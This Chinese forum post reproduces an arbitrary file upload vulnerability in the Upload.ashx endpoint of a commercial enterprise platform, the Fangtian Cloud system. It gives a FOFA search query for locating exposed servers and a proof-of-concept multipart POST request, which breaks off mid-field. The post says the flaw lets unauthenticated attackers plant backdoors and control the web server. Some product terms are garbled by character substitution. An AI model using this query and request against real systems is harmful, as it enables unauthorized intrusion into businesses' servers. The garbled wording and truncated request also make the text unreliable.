方天云聪明平台系统 Upload.ashx 任意文件上传漏洞复现

打印 上一主题 下一主题

主题 933|帖子 933|积分 2803

0x01 产物简介

方天云聪明平台系统,作为方天科技公司的重要产物,是一款面向企业全流程的业务管理功能平台,集成了ERP(企业资源规划)、MES(车间执行系统)、APS(先辈规划与排程)、PLM(产物生命周期)、CRM(客户关系管理)等多种功能模块,旨在通过云端服务为企业提供数字化、智能化的管明白决方案。
0x02 漏洞概述

方天云聪明平台系统 Upload.ashx 接口处存在任意文件上传漏洞,未经身份验证的攻击者可通过该漏洞在服务器端任意执行代码,写入后门,获取服务器权限,进而控制整个 web 服务器。
0x03 复现环境

FOFA:body="AjaxMethods.asmx/GetCompanyItem"

0x04 漏洞复现

PoC
  1. POST /Upload.ashx HTTP/1.1
  2. Host:
  3. User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0
  4. Content-Type: multipart/form-data; boundary=----WebKitFormBoundarySl8siBbmVicABvTX
  5. Connection: close
  6. ------WebKitFormBoundarySl8siBbmVicABvTX
  7. Content-Disposition: form-data; name="fi
复制代码
免责声明:如果侵犯了您的权益,请联系站长,我们会及时删除侵权内容,谢谢合作!更多信息从访问主页:qidao123.com:ToB企服之家,中国第一个企服评测及商务社交产业平台。
回复

使用道具 举报

0 个回复

倒序浏览

快速回复

您需要登录后才可以回帖 登录 or 立即注册

本版积分规则

东湖之滨

金牌会员
这个人很懒什么都没写!

标签云

快速回复 返回顶部 返回列表